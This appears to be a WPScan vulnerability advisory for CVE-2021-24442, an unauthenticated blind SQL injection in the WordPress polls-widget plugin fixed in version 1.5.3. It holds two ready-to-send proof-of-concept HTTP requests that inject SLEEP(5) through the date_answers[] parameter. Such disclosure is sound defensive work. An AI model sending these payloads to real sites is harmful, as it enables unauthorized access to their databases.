logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection

Description

The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks

Proof of Concept

v < 1.5.3

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)

v < 1.5.1

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)

Affects Plugins

polls-widget

Fixed in version 1.5.3

References

CVE

CVE-2021-24442

URL

https://www.in-spired.xyz/wpdevart-polls-blind-sql-injection/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Toby Jackson

Submitter

Toby Jackson

Submitter website

https://in-spired.xyz

Submitter twitter

_inspir3d

Verified

Yes

WPVDB ID

7376666e-9b2a-4239-b11f-8544435b444a

Timeline

Publicly Published

2021-06-22 (about 5 months ago)

Added

2021-06-22 (about 5 months ago)

Last Updated

2021-06-22 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin